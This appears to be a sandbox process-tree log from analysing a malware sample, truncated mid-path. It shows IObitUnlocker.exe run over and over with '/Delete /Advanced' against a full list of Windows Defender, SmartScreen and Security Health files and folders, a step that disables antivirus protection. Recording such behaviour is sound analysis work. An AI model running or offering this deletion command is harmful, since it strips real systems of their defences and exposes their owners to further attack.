                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:11152
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:12056
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11292
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:11760
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:11980
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:12136
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:11504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:11616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 